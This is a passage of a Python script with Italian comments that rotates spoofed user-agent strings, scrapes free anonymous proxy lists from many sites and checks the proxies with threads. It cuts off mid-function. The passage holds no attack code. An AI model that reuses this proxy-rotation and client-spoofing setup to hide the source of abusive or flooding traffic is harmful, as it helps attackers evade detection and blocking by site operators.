"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23",
"msnbot/0.11 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.0 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.1 ( http://search.msn.com/msnbot.htm)",
"msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)",
"NetSurf/1.2 (NetBSD; amd64)",
"Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0",
"Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0",
"NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1",
"nook browser/1.0",
"Offline Explorer/2.5",
"Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30",
"Opera/7.50 (Windows ME; U) [en]",
"Opera/7.50 (Windows XP; U)",
"Opera/7.51 (Windows NT 5.1; U) [en]",
"Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr)",
"Opera/9.0 (Macintosh; PPC Mac OS X; U; en)",
"Opera/9.20 (Macintosh; Intel Mac OS X; U; en)",
"Opera/9.25 (Windows NT 6.0; U; en)",
"Opera/9.30 (Nintendo Wii; U; ; 2047-7; en)",
"Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en)",
"Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0",
"Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0",
"Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1",
"Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1",
"Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61",
"Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00",
"Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00",
"Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10",
"Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10",
"Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
"P3P Validator",
"Peach/1.01 (Ubuntu 8.04 LTS; U; en)",
"POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1",
"POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1",
"portalmmm/2.0 N410i(c20;TB) ",
"Python-urllib/2.5",
"SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3",
"SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"SearchExpress",
"SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr)",
"SEC-SGHX210/1.0 UP.Link/6.3.1.13.0",
"SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0",
"SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT100/R101",
"SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0",
"SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonT68/R201A",
"SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US]",
"SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0",
"SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"SuperBot/4.4.0.60 (Windows XP)",
"Uzbl (Webkit 1.3) (Linux i686 [i686])",
"Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1",
"W3C_Validator/1.305.2.12 libwww-perl/5.64",
"W3C_Validator/1.654",
"w3m/0.5.1",
"WDG_Validator/1.6.2",
"WebCopier v4.6",
"Web Downloader/6.9",
"WebZIP/3.5 (http://www.spidersoft.com)",
"Wget/1.9.1",
"Wget/1.9 cvs-stable (Red Hat modified)",
"wii libnup/1.0",
]
# urls vari
nurls = ["http://www.aliveproxy.com/high-anonymity-proxy-list/", "http://www.aliveproxy.com/anonymous-proxy-list/",
"http://www.aliveproxy.com/fastest-proxies/", "http://www.aliveproxy.com/us-proxy-list/", "http://www.aliveproxy.com/gb-proxy-list/",
"http://www.aliveproxy.com/fr-proxy-list/", "http://www.aliveproxy.com/de-proxy-list/", "http://www.aliveproxy.com/jp-proxy-list/",
"http://www.aliveproxy.com/ca-proxy-list/", "http://www.aliveproxy.com/ru-proxy-list/", "http://www.aliveproxy.com/proxy-list-port-80/",
"http://www.aliveproxy.com/proxy-list-port-81/", "http://www.aliveproxy.com/proxy-list-port-3128/", "http://www.aliveproxy.com/proxy-list-port-8000/",
"http://www.aliveproxy.com/proxy-list-port-8080/", "http://webanetlabs.net/publ/24", "http://www.proxz.com/proxy_list_high_anonymous_0.html",
"http://www.proxz.com/proxy_list_anonymous_us_0.html", "http://www.proxz.com/proxy_list_uk_0.html", "http://www.proxz.com/proxy_list_ca_0.html",
"http://www.proxz.com/proxy_list_cn_ssl_0.html", "http://www.proxz.com/proxy_list_jp_0.html", "http://www.proxz.com/proxy_list_fr_0.html",
"http://www.proxz.com/proxy_list_port_std_0.html", "http://www.proxz.com/proxy_list_port_nonstd_0.html", "http://www.proxz.com/proxy_list_transparent_0.html",
"http://www.proxylists.net/", "https://www.my-proxy.com/free-proxy-list.html","https://www.my-proxy.com/free-elite-proxy.html",
"https://www.my-proxy.com/free-anonymous-proxy.html", "https://www.my-proxy.com/free-transparent-proxy.html","https://jffjdjkbfek.000webhostapp.com/proxy.txt"]
def proxyget(url): # scarica proxy da altri siti
try:
req = urllib.request.Request(url) # url corrispondente a una serie di urls impostati sotto.
req.add_header("User-Agent", random.choice(useragents)) # aggiunge uno user agent a caso dalla lista sopra
sourcecode = urllib.request.urlopen(req, timeout = 10) # scaricamento sourcecode pagina + timeout impostato a 10
for line in sourcecode :
ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line)) # cerca ip proxy
ipf = list(filter(lambda x: x if not x.startswith("0.") else None, ip)) # evita di cattutrare anche ip inutili
if ipf: # se trova ip prosegue
for x in ipf:
ipfinal = x # se lo prende ipfinal
out_file = open("proxy.txt","a")
while True:
out_file.write(x+"\n") # scrive ip uno per uno nel file proxy.txt
out_file.close()
break # appena finisce ferma il ciclo
except:
print("\nAn error occurred, skipping to the next website.")
def proxyget2(url): # lo dice il nome, questa funzione scarica i proxies
try:
req = urllib.request.Request((url)) # qua impostiamo il sito da dove scaricare.
req.add_header("User-Agent", random.choice(useragents)) # siccome il format del sito e' identico sia
sourcecode = urllib.request.urlopen(req, timeout=10) # per free-proxy-list.net che per socks-proxy.net,
part = str(sourcecode.read()) # imposto la variabile urlproxy in base a cosa si sceglie.
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("proxy.txt","a")
out_file.write(proxies)
out_file.close()
except: # se succede qualche casino
print("\nAn error occurred, skipping to the next website.")
def blogspotget(url, word, word2): # anche questa funzione scarica proxy pero' dai siti blogspot
try:
soup = BeautifulSoup(urllib.request.urlopen(url))
for tag in soup.find_all(word2, word): # bs4, dopo aver processato la source, trova la parte riguardante le proxylist
links = tag.a.get("href") # prende i link delle proxylist
result = urllib.request.urlopen(links) # finalmente apre i link trovati
for line in result :
ip = re.findall("(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}):(?:[\d]{1,5})", str(line)) # cerca gli ip:porta nelle pagine
if ip: # se ha trovato gli ip prosegue
for x in ip:
out_file = open("proxy.txt","a") # scrittura singolo ip nella proxy.txt
while True:
out_file.write(x+"\n") # scrive ip uno per uno nel file proxy.txt
out_file.close()
break # il ciclo si ferma non appena ha finito
except:
print("\nAn error occurred, skipping to the next website.")
def proxylist(): # funzione per la creazione della proxylist
global proxies
print ("\nChecking for duplicates...")
proxies = open("proxy.txt").readlines() # la lista txt presenta doppioni, quindi:
proxiesp = []
for i in proxies:
if i not in proxiesp: # se il proxy non è già presente in proxiesp
proxiesp.append(i) # li aggiunge in proxiesp
filepr = open("proxy.txt", "w") # prima cancella contenuto del file
filepr.close()
filepr = open("proxy.txt", "a") # dopo lo apre in modalità a per non sovrascrivere i proxy
for i in proxiesp:
filepr.write(i)
print("Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines())))
print ("\nProxylist Updated!\n")
def proxycheckerinit():
global out_file
candidate_proxies = open("proxy.txt").readlines()
filedl = open("proxy.txt", "w") # prima cancella contenuto
filedl.close()
out_file = open("proxy.txt", "a") # e poi lo apre non in riscrivibile
for i in candidate_proxies:
threading.Thread(target=proxychecker, args=[i]).start() # avvia un thread per proxy per velocizzare
def proxychecker(i):
proxy = 'http://' + i
proxy_support = urllib.request.ProxyHandler({'http' : proxy}) # compone la richiesta con il proxy
opener = urllib.request.build_opener(proxy_support)
urllib.request.install_opener(opener)
try:
urllib.request.urlopen("http://www.google.com", timeout=10)
print ("%s works!\n\n" % proxy) # se funziona printa "it works"
out_file.write(i) # e lo scrive nel file.
except:
print ("%s does not respond.\n\n" % proxy) #altrimenti dice che non risponde
def main(): # funzione effettiva del programma.
try:
out_file = open("proxy.txt","w") # prima di tutto cancella il contenuto di proxy.txt
out_file.close()
print ("\nDownloading from free-proxy-list in progress...")
url = "http://free-proxy-list.net/"
proxyget2(url) # manda url alla funzione
url = "https://www.us-proxy.org/"
proxyget2(url)
print("Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines()))) # rpinta la lunghezza attuale del file, che sarebbe il numero di proxy
print ("\nDownloading from blogspot in progress...\n")
url = "http://www.proxyserverlist24.top/"
word = "post-title entry-title"
word2 = "h3"
blogspotget(url,word, word2) # manda url, e due variabili a blogspotget
url = "https://proxylistdaily4you.blogspot.com/"
word = "post-body entry-content"
word2 = "div"
blogspotget(url,word,word2)
print("Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines())))
print ("\nDownloading from various mirrors in progress...")
for position, url in enumerate(nurls):
proxyget(url)
print("Completed downloads: (%s/%s)\nCurrent IPs in proxylist: %s" % (position+1, len(nurls), len(open("proxy.txt").readlines())))
print ("\nDownloading from foxtools in progress...")
foxtools = ['http://api.foxtools.ru/v2/Proxy.txt?page=%d' % n for n in range(1, 6)] # per prendere ip di tutte e 6 le pagine
for position, url in enumerate(foxtools):
proxyget(url)
print("Current IPs in proxylist: %s" % (len(open("proxy.txt").readlines())))
proxylist() # dopo esegue questa funzione che setta meglio la lista
print("\n")
while True:
